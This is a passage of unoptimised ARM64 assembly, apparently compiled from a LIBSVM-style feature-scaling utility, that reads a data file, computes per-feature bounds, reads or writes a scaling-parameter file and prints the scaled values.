#0, LBB1_77 b LBB1_76 LBB1_76: ; in Loop: Header=BB1_71 Depth=1 adrp x8, _y_min@PAGE ldr d0, [x8, _y_min@PAGEOFF] str d0, [sp, #112] ; 8-byte Folded Spill b LBB1_78 LBB1_77: ; in Loop: Header=BB1_71 Depth=1 ldur d0, [x29, #-112] str d0, [sp, #112] ; 8-byte Folded Spill b LBB1_78 LBB1_78: ; in Loop: Header=BB1_71 Depth=1 ldr d0, [sp, #112] ; 8-byte Folded Reload adrp x8, _y_min@PAGE str d0, [x8, _y_min@PAGEOFF] b LBB1_79 LBB1_79: ; Parent Loop BB1_71 Depth=1 ; => This Inner Loop Header: Depth=2 ldur x8, [x29, #-96] ldrsb w0, [x8] bl _isspace subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_81 b LBB1_80 LBB1_80: ; in Loop: Header=BB1_79 Depth=2 ldur x8, [x29, #-96] add x8, x8, #1 stur x8, [x29, #-96] b LBB1_79 LBB1_81: ; in Loop: Header=BB1_71 Depth=1 b LBB1_82 LBB1_82: ; Parent Loop BB1_71 Depth=1 ; => This Inner Loop Header: Depth=2 ldur x8, [x29, #-96] ldrsb w0, [x8] bl _isspace subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB1_84 b LBB1_83 LBB1_83: ; in Loop: Header=BB1_82 Depth=2 ldur x8, [x29, #-96] add x8, x8, #1 stur x8, [x29, #-96] b LBB1_82 LBB1_84: ; in Loop: Header=BB1_71 Depth=1 b LBB1_85 LBB1_85: ; Parent Loop BB1_71 Depth=1 ; => This Loop Header: Depth=2 ; Child Loop BB1_87 Depth 3 ; Child Loop BB1_103 Depth 3 ; Child Loop BB1_106 Depth 3 ; Child Loop BB1_109 Depth 3 ldur x0, [x29, #-96] mov x9, sp sub x8, x29, #40 str x8, [x9] sub x8, x29, #120 str x8, [x9, #8] adrp x1, l_.str.10@PAGE add x1, x1, l_.str.10@PAGEOFF bl _sscanf subs w8, w0, #2 cset w8, ne tbnz w8, #0, LBB1_114 b LBB1_86 LBB1_86: ; in Loop: Header=BB1_85 Depth=2 ldur w8, [x29, #-100] stur w8, [x29, #-36] b LBB1_87 LBB1_87: ; Parent Loop BB1_71 Depth=1 ; Parent Loop BB1_85 Depth=2 ; => This Inner Loop Header: Depth=3 ldur w8, [x29, #-36] ldur w9, [x29, #-40] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB1_96 b LBB1_88 LBB1_88: ; in Loop: Header=BB1_87 Depth=3 ldr x8, [sp, #184] ; 8-byte Folded Reload ldr x8, [x8] ldursw x9, [x29, #-36] ldr d0, [x8, x9, lsl #3] fcmp d0, #0.0 cset w8, le tbnz w8, #0, LBB1_90 b LBB1_89 LBB1_89: ; in Loop: Header=BB1_87 Depth=3 ldr x8, [sp, #184] ; 8-byte Folded Reload ldr x8, [x8] ldursw x9, [x29, #-36] ldr d0, [x8, x9, lsl #3] str d0, [sp, #104] ; 8-byte Folded Spill b LBB1_91 LBB1_90: ; in Loop: Header=BB1_87 Depth=3 movi d0, #0000000000000000 str d0, [sp, #104] ; 8-byte Folded Spill b LBB1_91 LBB1_91: ; in Loop: Header=BB1_87 Depth=3 ldr x8, [sp, #192] ; 8-byte Folded Reload ldr x9, [sp, #184] ; 8-byte Folded Reload ldr d0, [sp, #104] ; 8-byte Folded Reload ldr x9, [x9] ldursw x10, [x29, #-36] str d0, [x9, x10, lsl #3] ldr x8, [x8] ldursw x9, [x29, #-36] ldr d0, [x8, x9, lsl #3] fcmp d0, #0.0 cset w8, pl tbnz w8, #0, LBB1_93 b LBB1_92 LBB1_92: ; in Loop: Header=BB1_87 Depth=3 ldr x8, [sp, #192] ; 8-byte Folded Reload ldr x8, [x8] ldursw x9, [x29, #-36] ldr d0, [x8, x9, lsl #3] str d0, [sp, #96] ; 8-byte Folded Spill b LBB1_94 LBB1_93: ; in Loop: Header=BB1_87 Depth=3 movi d0, #0000000000000000 str d0, [sp, #96] ; 8-byte Folded Spill b LBB1_94 LBB1_94: ; in Loop: Header=BB1_87 Depth=3 ldr x8, [sp, #192] ; 8-byte Folded Reload ldr d0, [sp, #96] ; 8-byte Folded Reload ldr x8, [x8] ldursw x9, [x29, #-36] str d0, [x8, x9, lsl #3] b LBB1_95 LBB1_95: ; in Loop: Header=BB1_87 Depth=3 ldur w8, [x29, #-36] add w8, w8, #1 stur w8, [x29, #-36] b LBB1_87 LBB1_96: ; in Loop: Header=BB1_85 Depth=2 ldr x8, [sp, #184] ; 8-byte Folded Reload ldr x8, [x8] ldursw x9, [x29, #-40] ldr d0, [x8, x9, lsl #3] ldur d1, [x29, #-120] fcmp d0, d1 cset w8, le tbnz w8, #0, LBB1_98 b LBB1_97 LBB1_97: ; in Loop: Header=BB1_85 Depth=2 ldr x8, [sp, #184] ; 8-byte Folded Reload ldr x8, [x8] ldursw x9, [x29, #-40] ldr d0, [x8, x9, lsl #3] str d0, [sp, #88] ; 8-byte Folded Spill b LBB1_99 LBB1_98: ; in Loop: Header=BB1_85 Depth=2 ldur d0, [x29, #-120] str d0, [sp, #88] ; 8-byte Folded Spill b LBB1_99 LBB1_99: ; in Loop: Header=BB1_85 Depth=2 ldr x8, [sp, #192] ; 8-byte Folded Reload ldr x9, [sp, #184] ; 8-byte Folded Reload ldr d0, [sp, #88] ; 8-byte Folded Reload ldr x9, [x9] ldursw x10, [x29, #-40] str d0, [x9, x10, lsl #3] ldr x8, [x8] ldursw x9, [x29, #-40] ldr d0, [x8, x9, lsl #3] ldur d1, [x29, #-120] fcmp d0, d1 cset w8, pl tbnz w8, #0, LBB1_101 b LBB1_100 LBB1_100: ; in Loop: Header=BB1_85 Depth=2 ldr x8, [sp, #192] ; 8-byte Folded Reload ldr x8, [x8] ldursw x9, [x29, #-40] ldr d0, [x8, x9, lsl #3] str d0, [sp, #80] ; 8-byte Folded Spill b LBB1_102 LBB1_101: ; in Loop: Header=BB1_85 Depth=2 ldur d0, [x29, #-120] str d0, [sp, #80] ; 8-byte Folded Spill b LBB1_102 LBB1_102: ; in Loop: Header=BB1_85 Depth=2 ldr x8, [sp, #192] ; 8-byte Folded Reload ldr d0, [sp, #80] ; 8-byte Folded Reload ldr x8, [x8] ldursw x9, [x29, #-40] str d0, [x8, x9, lsl #3] b LBB1_103 LBB1_103: ; Parent Loop BB1_71 Depth=1 ; Parent Loop BB1_85 Depth=2 ; => This Inner Loop Header: Depth=3 ldur x8, [x29, #-96] ldrsb w8, [x8] subs w8, w8, #58 cset w8, eq tbnz w8, #0, LBB1_105 b LBB1_104 LBB1_104: ; in Loop: Header=BB1_103 Depth=3 ldur x8, [x29, #-96] add x8, x8, #1 stur x8, [x29, #-96] b LBB1_103 LBB1_105: ; in Loop: Header=BB1_85 Depth=2 ldur x8, [x29, #-96] add x8, x8, #1 stur x8, [x29, #-96] b LBB1_106 LBB1_106: ; Parent Loop BB1_71 Depth=1 ; Parent Loop BB1_85 Depth=2 ; => This Inner Loop Header: Depth=3 ldur x8, [x29, #-96] ldrsb w0, [x8] bl _isspace subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_108 b LBB1_107 LBB1_107: ; in Loop: Header=BB1_106 Depth=3 ldur x8, [x29, #-96] add x8, x8, #1 stur x8, [x29, #-96] b LBB1_106 LBB1_108: ; in Loop: Header=BB1_85 Depth=2 b LBB1_109 LBB1_109: ; Parent Loop BB1_71 Depth=1 ; Parent Loop BB1_85 Depth=2 ; => This Inner Loop Header: Depth=3 ldur x8, [x29, #-96] ldrsb w8, [x8] subs w8, w8, #0 cset w8, eq mov w9, #0 str w9, [sp, #76] ; 4-byte Folded Spill tbnz w8, #0, LBB1_111 b LBB1_110 LBB1_110: ; in Loop: Header=BB1_109 Depth=3 ldur x8, [x29, #-96] ldrsb w0, [x8] bl _isspace subs w8, w0, #0 cset w8, eq str w8, [sp, #76] ; 4-byte Folded Spill b LBB1_111 LBB1_111: ; in Loop: Header=BB1_109 Depth=3 ldr w8, [sp, #76] ; 4-byte Folded Reload tbz w8, #0, LBB1_113 b LBB1_112 LBB1_112: ; in Loop: Header=BB1_109 Depth=3 ldur x8, [x29, #-96] add x8, x8, #1 stur x8, [x29, #-96] b LBB1_109 LBB1_113: ; in Loop: Header=BB1_85 Depth=2 ldur w8, [x29, #-40] add w8, w8, #1 stur w8, [x29, #-100] b LBB1_85 LBB1_114: ; in Loop: Header=BB1_71 Depth=1 ldur w8, [x29, #-100] stur w8, [x29, #-36] b LBB1_115 LBB1_115: ; Parent Loop BB1_71 Depth=1 ; => This Inner Loop Header: Depth=2 ldr x9, [sp, #176] ; 8-byte Folded Reload ldur w8, [x29, #-36] ldr w9, [x9] subs w8, w8, w9 cset w8, gt tbnz w8, #0, LBB1_124 b LBB1_116 LBB1_116: ; in Loop: Header=BB1_115 Depth=2 ldr x8, [sp, #184] ; 8-byte Folded Reload ldr x8, [x8] ldursw x9, [x29, #-36] ldr d0, [x8, x9, lsl #3] fcmp d0, #0.0 cset w8, le tbnz w8, #0, LBB1_118 b LBB1_117 LBB1_117: ; in Loop: Header=BB1_115 Depth=2 ldr x8, [sp, #184] ; 8-byte Folded Reload ldr x8, [x8] ldursw x9, [x29, #-36] ldr d0, [x8, x9, lsl #3] str d0, [sp, #64] ; 8-byte Folded Spill b LBB1_119 LBB1_118: ; in Loop: Header=BB1_115 Depth=2 movi d0, #0000000000000000 str d0, [sp, #64] ; 8-byte Folded Spill b LBB1_119 LBB1_119: ; in Loop: Header=BB1_115 Depth=2 ldr x8, [sp, #192] ; 8-byte Folded Reload ldr x9, [sp, #184] ; 8-byte Folded Reload ldr d0, [sp, #64] ; 8-byte Folded Reload ldr x9, [x9] ldursw x10, [x29, #-36] str d0, [x9, x10, lsl #3] ldr x8, [x8] ldursw x9, [x29, #-36] ldr d0, [x8, x9, lsl #3] fcmp d0, #0.0 cset w8, pl tbnz w8, #0, LBB1_121 b LBB1_120 LBB1_120: ; in Loop: Header=BB1_115 Depth=2 ldr x8, [sp, #192] ; 8-byte Folded Reload ldr x8, [x8] ldursw x9, [x29, #-36] ldr d0, [x8, x9, lsl #3] str d0, [sp, #56] ; 8-byte Folded Spill b LBB1_122 LBB1_121: ; in Loop: Header=BB1_115 Depth=2 movi d0, #0000000000000000 str d0, [sp, #56] ; 8-byte Folded Spill b LBB1_122 LBB1_122: ; in Loop: Header=BB1_115 Depth=2 ldr x8, [sp, #192] ; 8-byte Folded Reload ldr d0, [sp, #56] ; 8-byte Folded Reload ldr x8, [x8] ldursw x9, [x29, #-36] str d0, [x8, x9, lsl #3] b LBB1_123 LBB1_123: ; in Loop: Header=BB1_115 Depth=2 ldur w8, [x29, #-36] add w8, w8, #1 stur w8, [x29, #-36] b LBB1_115 LBB1_124: ; in Loop: Header=BB1_71 Depth=1 b LBB1_71 LBB1_125: ldur x0, [x29, #-48] bl _rewind ldur x8, [x29, #-72] subs x8, x8, #0 cset w8, eq tbnz w8, #0, LBB1_137 b LBB1_126 LBB1_126: ldur x0, [x29, #-56] bl _fgetc stur w0, [x29, #-128] subs w8, w0, #121 cset w8, ne tbnz w8, #0, LBB1_128 b LBB1_127 LBB1_127: ldr x8, [sp, #160] ; 8-byte Folded Reload ldr x10, [sp, #152] ; 8-byte Folded Reload ldur x0, [x29, #-56] mov x9, sp str x10, [x9] str x8, [x9, #8] adrp x1, l_.str.11@PAGE add x1, x1, l_.str.11@PAGEOFF str x1, [sp, #48] ; 8-byte Folded Spill bl _fscanf ldr x1, [sp, #48] ; 8-byte Folded Reload ldur x0, [x29, #-56] mov x9, sp adrp x8, _y_min@PAGE add x8, x8, _y_min@PAGEOFF str x8, [x9] adrp x8, _y_max@PAGE add x8, x8, _y_max@PAGEOFF str x8, [x9, #8] bl _fscanf adrp x9, _y_scaling@PAGE mov w8, #1 str w8, [x9, _y_scaling@PAGEOFF] b LBB1_129 LBB1_128: ldur w0, [x29, #-128] ldur x1, [x29, #-56] bl _ungetc b LBB1_129 LBB1_129: ldur x0, [x29, #-56] bl _fgetc subs w8, w0, #120 cset w8, ne tbnz w8, #0, LBB1_136 b LBB1_130 LBB1_130: ldur x0, [x29, #-56] mov x9, sp adrp x8, _lower@PAGE add x8, x8, _lower@PAGEOFF str x8, [x9] adrp x8, _upper@PAGE add x8, x8, _upper@PAGEOFF str x8, [x9, #8] adrp x1, l_.str.11@PAGE add x1, x1, l_.str.11@PAGEOFF bl _fscanf b LBB1_131 LBB1_131: ; =>This Inner Loop Header: Depth=1 ldur x0, [x29, #-56] mov x9, sp sub x8, x29, #124 str x8, [x9] sub x8, x29, #136 str x8, [x9, #8] sub x8, x29, #144 str x8, [x9, #16] adrp x1, l_.str.12@PAGE add x1, x1, l_.str.12@PAGEOFF bl _fscanf subs w8, w0, #3 cset w8, ne tbnz w8, #0, LBB1_135 b LBB1_132 LBB1_132: ; in Loop: Header=BB1_131 Depth=1 ldr x9, [sp, #176] ; 8-byte Folded Reload ldur w8, [x29, #-124] ldr w9, [x9] subs w8, w8, w9 cset w8, gt tbnz w8, #0, LBB1_134 b LBB1_133 LBB1_133: ; in Loop: Header=BB1_131 Depth=1 ldr x8, [sp, #184] ; 8-byte Folded Reload ldr x9, [sp, #192] ; 8-byte Folded Reload ldur d0, [x29, #-136] ldr x9, [x9] ldursw x10, [x29, #-124] str d0, [x9, x10, lsl #3] ldur d0, [x29, #-144] ldr x8, [x8] ldursw x9, [x29, #-124] str d0, [x8, x9, lsl #3] b LBB1_134 LBB1_134: ; in Loop: Header=BB1_131 Depth=1 b LBB1_131 LBB1_135: b LBB1_136 LBB1_136: ldur x0, [x29, #-56] bl _fclose b LBB1_137 LBB1_137: ldur x8, [x29, #-64] subs x8, x8, #0 cset w8, eq tbnz w8, #0, LBB1_149 b LBB1_138 LBB1_138: ldur x0, [x29, #-64] adrp x1, l_.str.13@PAGE add x1, x1, l_.str.13@PAGEOFF bl _fopen stur x0, [x29, #-152] ldur x8, [x29, #-152] subs x8, x8, #0 cset w8, ne tbnz w8, #0, LBB1_140 b LBB1_139 LBB1_139: ldr x8, [sp, #168] ; 8-byte Folded Reload ldr x0, [x8] ldur x8, [x29, #-64] mov x9, sp str x8, [x9] adrp x1, l_.str.5@PAGE add x1, x1, l_.str.5@PAGEOFF bl _fprintf mov w0, #1 bl _exit LBB1_140: adrp x8, _y_scaling@PAGE ldr w8, [x8, _y_scaling@PAGEOFF] subs w8, w8, #0 cset w8, eq tbnz w8, #0, LBB1_142 b LBB1_141 LBB1_141: ldur x0, [x29, #-152] adrp x1, l_.str.14@PAGE add x1, x1, l_.str.14@PAGEOFF bl _fprintf ldr x9, [sp, #152] ; 8-byte Folded Reload ldr x8, [sp, #160] ; 8-byte Folded Reload ldur x0, [x29, #-152] ldr d1, [x9] ldr d0, [x8] mov x8, sp str d1, [x8] str d0, [x8, #8] adrp x1, l_.str.15@PAGE add x1, x1, l_.str.15@PAGEOFF str x1, [sp, #40] ; 8-byte Folded Spill bl _fprintf ldr x1, [sp, #40] ; 8-byte Folded Reload ldur x0, [x29, #-152] adrp x8, _y_min@PAGE ldr d1, [x8, _y_min@PAGEOFF] adrp x8, _y_max@PAGE ldr d0, [x8, _y_max@PAGEOFF] mov x8, sp str d1, [x8] str d0, [x8, #8] bl _fprintf b LBB1_142 LBB1_142: ldur x0, [x29, #-152] adrp x1, l_.str.16@PAGE add x1, x1, l_.str.16@PAGEOFF bl _fprintf ldur x0, [x29, #-152] adrp x8, _lower@PAGE ldr d1, [x8, _lower@PAGEOFF] adrp x8, _upper@PAGE ldr d0, [x8, _upper@PAGEOFF] mov x8, sp str d1, [x8] str d0, [x8, #8] adrp x1, l_.str.15@PAGE add x1, x1, l_.str.15@PAGEOFF bl _fprintf mov w8, #1 stur w8, [x29, #-36] b LBB1_143 LBB1_143: ; =>This Inner Loop Header: Depth=1 ldr x9, [sp, #176] ; 8-byte Folded Reload ldur w8, [x29, #-36] ldr w9, [x9] subs w8, w8, w9 cset w8, gt tbnz w8, #0, LBB1_148 b LBB1_144 LBB1_144: ; in Loop: Header=BB1_143 Depth=1 ldr x8, [sp, #184] ; 8-byte Folded Reload ldr x9, [sp, #192] ; 8-byte Folded Reload ldr x9, [x9] ldursw x10, [x29, #-36] ldr d0, [x9, x10, lsl #3] ldr x8, [x8] ldursw x9, [x29, #-36] ldr d1, [x8, x9, lsl #3] fcmp d0, d1 cset w8, eq tbnz w8, #0, LBB1_146 b LBB1_145 LBB1_145: ; in Loop: Header=BB1_143 Depth=1 ldr x8, [sp, #184] ; 8-byte Folded Reload ldr x10, [sp, #192] ; 8-byte Folded Reload ldur x0, [x29, #-152] ldur w11, [x29, #-36] ; implicit-def: $x9 mov x9, x11 ldr x10, [x10] ldursw x11, [x29, #-36] ldr d1, [x10, x11, lsl #3] ldr x8, [x8] ldursw x10, [x29, #-36] ldr d0, [x8, x10, lsl #3] mov x8, sp str x9, [x8] str d1, [x8, #8] str d0, [x8, #16] adrp x1, l_.str.17@PAGE add x1, x1, l_.str.17@PAGEOFF bl _fprintf b LBB1_146 LBB1_146: ; in Loop: Header=BB1_143 Depth=1 b LBB1_147 LBB1_147: ; in Loop: Header=BB1_143 Depth=1 ldur w8, [x29, #-36] add w8, w8, #1 stur w8, [x29, #-36] b LBB1_143 LBB1_148: ldur x0, [x29, #-152] bl _fclose b LBB1_149 LBB1_149: b LBB1_150 LBB1_150: ; =>This Loop Header: Depth=1 ; Child Loop BB1_152 Depth 2 ; Child Loop BB1_155 Depth 2 ; Child Loop BB1_158 Depth 2 ; Child Loop BB1_160 Depth 3 ; Child Loop BB1_164 Depth 3 ; Child Loop BB1_167 Depth 3 ; Child Loop BB1_170 Depth 3 ; Child Loop BB1_176 Depth 2 ldur x0, [x29, #-48] bl _readline subs x8, x0, #0 cset w8, eq tbnz w8, #0, LBB1_180 b LBB1_151 LBB1_151: ; in Loop: Header=BB1_150 Depth=1 adrp x8, _line@PAGE ldr x8, [x8, _line@PAGEOFF] stur x8, [x29, #-160] mov w8, #1 stur w8, [x29, #-164] ldur x0, [x29, #-160] mov x9, sp sub x8, x29, #176 str x8, [x9] adrp x1, l_.str.9@PAGE add x1, x1, l_.str.9@PAGEOFF bl _sscanf ldur d0, [x29, #-176] bl _output_target b LBB1_152 LBB1_152: ; Parent Loop BB1_150 Depth=1 ; => This Inner Loop Header: Depth=2 ldur x8, [x29, #-160] ldrsb w0, [x8] bl _isspace subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_154 b LBB1_153 LBB1_153: ; in Loop: Header=BB1_152 Depth=2 ldur x8, [x29, #-160] add x8, x8, #1 stur x8, [x29, #-160] b LBB1_152 LBB1_154: ; in Loop: Header=BB1_150 Depth=1 b LBB1_155 LBB1_155: ; Parent Loop BB1_150 Depth=1 ; => This Inner Loop Header: Depth=2 ldur x8, [x29, #-160] ldrsb w0, [x8] bl _isspace subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB1_157 b LBB1_156 LBB1_156: ; in Loop: Header=BB1_155 Depth=2 ldur x8, [x29, #-160] add x8, x8, #1 stur x8, [x29, #-160] b LBB1_155 LBB1_157: ; in Loop: Header=BB1_150 Depth=1 b LBB1_158 LBB1_158: ; Parent Loop BB1_150 Depth=1 ; => This Loop Header: Depth=2 ; Child Loop BB1_160 Depth 3 ; Child Loop BB1_164 Depth 3 ; Child Loop BB1_167 Depth 3 ; Child Loop BB1_170 Depth 3 ldur x0, [x29, #-160] mov x9, sp sub x8, x29, #40 str x8, [x9] sub x8, x29, #184 str x8, [x9, #8] adrp x1, l_.str.10@PAGE add x1, x1, l_.str.10@PAGEOFF bl _sscanf subs w8, w0, #2 cset w8, ne tbnz w8, #0, LBB1_175 b LBB1_159 LBB1_159: ; in Loop: Header=BB1_158 Depth=2 ldur w8, [x29, #-164] stur w8, [x29, #-36] b LBB1_160 LBB1_160: ; Parent Loop BB1_150 Depth=1 ; Parent Loop BB1_158 Depth=2 ; => This Inner Loop Header: Depth=3 ldur w8, [x29, #-36] ldur w9, [x29, #-40] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB1_163 b LBB1_161 LBB1_161: ; in Loop: Header=BB1_160 Depth=3 ldur w0, [x29, #-36] movi d0, #0000000000000000 bl _output b LBB1_162 LBB1_162: ; in Loop: Header=BB1_160 Depth=3 ldur w8, [x29, #-36] add w8, w8, #1 stur w8, [x29, #-36] b LBB1_160 LBB1_163: ; in Loop: Header=BB1_158 Depth=2 ldur w0, [x29, #-40] ldur d0, [x29, #-184] bl _output b LBB1_164 LBB1_164: ; Parent Loop BB1_150 Depth=1 ; Parent Loop BB1_158 Depth=2 ; => This Inner Loop Header: Depth=3 ldur x8, [x29, #-160] ldrsb w8, [x8] subs w8, w8, #58 cset w8, eq tbnz w8, #0, LBB1_166 b LBB1_165 LBB1_165: ; in Loop: Header=BB1_164 Depth=3 ldur x8, [x29, #-160] add x8, x8, #1 stur x8, [x29, #-160] b LBB1_164 LBB1_166: ; in Loop: Header=BB1_158 Depth=2 ldur x8, [x29, #-160] add x8, x8, #1 stur x8, [x29, #-160] b LBB1_167 LBB1_167: ; Parent Loop BB1_150 Depth=1 ; Parent Loop BB1_158 Depth=2 ; => This Inner Loop Header: Depth=3 ldur x8, [x29, #-160] ldrsb w0, [x8] bl _isspace subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_169 b LBB1_168 LBB1_168: ; in Loop: Header=BB1_167 Depth=3 ldur x8, [x29, #-160] add x8, x8, #1 stur x8, [x29, #-160] b LBB1_167 LBB1_169: ; in Loop: Header=BB1_158 Depth=2 b LBB1_170 LBB1_170: ; Parent Loop BB1_150 Depth=1 ; Parent Loop BB1_158 Depth=2 ; => This Inner Loop Header: Depth=3 ldur x8, [x29, #-160] ldrsb w8, [x8] subs w8, w8, #0 cset w8, eq mov w9, #0 str w9, [sp, #36] ; 4-byte Folded Spill tbnz w8, #0, LBB1_172 b LBB1_171 LBB1_171: ; in Loop: Header=BB1_170 Depth=3 ldur x8, [x29, #-160] ldrsb w0, [x8] bl _isspace subs w8, w0, #0 cset w8, eq str w8, [sp, #36] ; 4-byte Folded Spill b LBB1_172 LBB1_172: ; in Loop: Header=BB1_170 Depth=3 ldr w8, [sp, #36] ; 4-byte Folded Reload tbz w8, #0, LBB1_174 b LBB1_173 LBB1_173: ; in Loop: Header=BB1_170 Depth=3 ldur x8, [x29, #-160] add x8, x8, #1 stur x8, [x29, #-160] b LBB1_170 LBB1_174: ; in Loop: Header=BB1_158 Depth=2 ldur w8, [x29, #-40] add w8, w8, #1 stur w8, [x29, #-164] b LBB1_158 LBB1_175: ; in Loop: Header=BB1_150 Depth=1 ldur w8, [x29, #-164] stur w8, [x29, #-36] b LBB1_176 LBB1_176: ; Parent Loop BB1_150 Depth=1 ; => This Inner Loop Header: Depth=2 ldr x9, [sp, #176] ; 8-byte Folded Reload ldur w8, [x29, #-36] ldr w9, [x9] subs w8, w8, w9 cset w8, gt tbnz w8, #0, LBB1_179 b LBB1_177 LBB1_177: ; in Loop: Header=BB1_176 Depth=2 ldur w0, [x29, #-36] movi d0, #0000000000000000 bl _output b LBB1_178 LBB1_178: ; in Loop: Header=BB1_176 Depth=2 ldur w8, [x29, #-36] add w8, w8, #1 stur w8, [x29, #-36] b LBB1_176 LBB1_179: ; in Loop: Header=BB1_150 Depth=1 adrp x0, l_.str.18@PAGE add x0, x0, l_.str.18@PAGEOFF bl _printf b LBB1_150 LBB1_180: adrp x8, _new_num_nonzeros@PAGE ldr x8, [x8, _new_num_nonzeros@PAGEOFF] adrp x9, _num_nonzeros@PAGE ldr x9, [x9, _num_nonzeros@PAGEOFF] subs x8, x8, x9 cset w8, le tbnz w8, #0, LBB1_182 b LBB1_181 LBB1_181: ldr x8, [sp, #168] ; 8-byte Folded Reload ldr x0, [x8] adrp x8, _num_nonzeros@PAGE ldr x10, [x8, _num_nonzeros@PAGEOFF] adrp x8, _new_num_nonzeros@PAGE ldr x8, [x8, _new_num_nonzeros@PAGEOFF] mov x9, sp str x10, [x9] str x8, [x9, #8] adrp x1, l_.str.19@PAGE add x1, x1, l_.str.19@PAGEOFF bl _fprintf b LBB1_182 LBB1_182: adrp x8, _line@PAGE ldr x0, [x8, _line@PAGEOFF] bl _free ldr x8, [sp, #184] ; 8-byte Folded Reload ldr x0, [x8] bl _free ldr x8, [sp, #192] ; 8-byte Folded Reload ldr x0, [x8] bl _free ldur x0, [x29, #-48] bl _fclose mov w0, #0 ldp x29, x30, [sp, #384] ; 16-byte Folded Reload ldp x28, x27, [sp, #368] ; 16-byte Folded Reload add sp, sp, #400 ret .cfi_endproc .p2align 2 lJTI1_0: .long LBB1_6-Ltmp0 .long LBB1_11-Ltmp0 .long LBB1_11-Ltmp0 .long LBB1_11-Ltmp0 .long LBB1_11-Ltmp0 .long LBB1_11-Ltmp0 .long LBB1_10-Ltmp0 .long LBB1_9-Ltmp0 .long LBB1_11-Ltmp0 .long LBB1_7-Ltmp0 .long LBB1_11-Ltmp0 .long LBB1_11-Ltmp0 .long LBB1_11-Ltmp0 .long LBB1_8-Ltmp0 ; -- End function .globl _readline ; -- Begin function readline .p2align 2 _readline: ; @readline .cfi_startproc ; %bb.0: sub sp, sp, #64 .cfi_def_cfa_offset 64 stp x29, x30, [sp, #48] ; 16-byte Folded Spill add x29, sp, #48 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur x0, [x29, #-16] adrp x8, _line@PAGE ldr x0, [x8, _line@PAGEOFF] adrp x8, _max_line_len@PAGE ldr w1, [x8, _max_line_len@PAGEOFF] ldur x2, [x29, #-16] bl _fgets subs x8, x0, #0 cset w8, ne tbnz w8, #0, LBB2_2 b LBB2_1 LBB2_1: ; kill: def $x8 killed $xzr stur xzr, [x29, #-8] b LBB2_8 LBB2_2: b LBB2_3 LBB2_3: ; =>This Inner Loop Header: Depth=1 adrp x8, _line@PAGE ldr x0, [x8, _line@PAGEOFF] mov w1, #10 bl _strrchr subs x8, x0, #0 cset w8, ne tbnz w8, #0, LBB2_7 b LBB2_4 LBB2_4: ; in Loop: Header=BB2_3 Depth=1 adrp x8, _max_line_len@PAGE str x8, [sp, #16] ; 8-byte Folded Spill ldr w9, [x8, _max_line_len@PAGEOFF] lsl w9, w9, #1 str w9, [x8, _max_line_len@PAGEOFF] adrp x9, _line@PAGE str x9, [sp, #8] ; 8-byte Folded Spill ldr x0, [x9, _line@PAGEOFF] ldrsw x1, [x8, _max_line_len@PAGEOFF] bl _realloc ldr x8, [sp, #8] ; 8-byte Folded Reload str x0, [x8, _line@PAGEOFF] ldr x0, [x8, _line@PAGEOFF] bl _strlen ldr x9, [sp, #8] ; 8-byte Folded Reload ldr x8, [sp, #16] ; 8-byte Folded Reload mov x10, x0 stur w10, [x29, #-20] ldr x9, [x9, _line@PAGEOFF] ldursw x10, [x29, #-20] add x0, x9, x10 ldr w8, [x8, _max_line_len@PAGEOFF] ldur w9, [x29, #-20] subs w1, w8, w9 ldur x2, [x29, #-16] bl _fgets subs x8, x0, #0 cset w8, ne tbnz w8, #0, LBB2_6 b LBB2_5 LBB2_5: b LBB2_7 LBB2_6: ; in Loop: Header=BB2_3 Depth=1 b LBB2_3 LBB2_7: adrp x8, _line@PAGE ldr x8, [x8, _line@PAGEOFF] stur x8, [x29, #-8] b LBB2_8 LBB2_8: ldur x0, [x29, #-8] ldp x29, x30, [sp, #48] ; 16-byte Folded Reload add sp, sp, #64 ret .cfi_endproc ; -- End function .globl _output_target ; -- Begin function output_target .p2align 2 _output_target: ; @output_target .cfi_startproc ; %bb.0: sub sp, sp, #48 .cfi_def_cfa_offset 48 stp x29, x30, [sp, #32] ; 16-byte Folded Spill add x29, sp, #32 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 adrp x8, _y_lower@GOTPAGE ldr x8, [x8, _y_lower@GOTPAGEOFF] str x8, [sp, #16] ; 8-byte Folded Spill stur d0, [x29, #-8] adrp x8, _y_scaling@PAGE ldr w8, [x8, _y_scaling@PAGEOFF] subs w8, w8, #0 cset w8, eq tbnz w8, #0, LBB3_8 b LBB3_1 LBB3_1: ldur d0, [x29, #-8] adrp x8, _y_min@PAGE ldr d1, [x8, _y_min@PAGEOFF] fcmp d0, d1 cset w8, ne tbnz w8, #0, LBB3_3 b LBB3_2 LBB3_2: ldr x8, [sp, #16] ; 8-byte Folded Reload ldr d0, [x8] stur d0, [x29, #-8] b LBB3_7 LBB3_3: ldur d0, [x29, #-8] adrp x8, _y_max@PAGE ldr d1, [x8, _y_max@PAGEOFF] fcmp d0, d1 cset w8, ne tbnz w8, #0, LBB3_5 b LBB3_4 LBB3_4: adrp x8, _y_upper@GOTPAGE ldr x8, [x8, _y_upper@GOTPAGEOFF] ldr d0, [x8] stur d0, [x29, #-8] b LBB3_6 LBB3_5: ldr x8, [sp, #16] ; 8-byte Folded Reload ldr d0, [x8] adrp x9, _y_upper@GOTPAGE ldr x9, [x9, _y_upper@GOTPAGEOFF] ldr d1, [x9] ldr d2, [x8] fsub d1, d1, d2 ldur d2, [x29, #-8] adrp x8, _y_min@PAGE ldr d3, [x8, _y_min@PAGEOFF] fsub d2, d2, d3 fmul d1, d1, d2 adrp x9, _y_max@PAGE ldr d2, [x9, _y_max@PAGEOFF] ldr d3, [x8, _y_min@PAGEOFF] fsub d2, d2, d3 fdiv d1, d1, d2 fadd d0, d0, d1 stur d0, [x29, #-8] b LBB3_6 LBB3_6: b LBB3_7 LBB3_7: b LBB3_8 LBB3_8: ldur d0, [x29, #-8] mov x8, sp str d0, [x8] adrp x0, l_.str.20@PAGE add x0, x0, l_.str.20@PAGEOFF bl _printf ldp x29, x30, [sp, #32] ; 16-byte Folded Reload add sp, sp, #48 ret .cfi_endproc ; -- End function 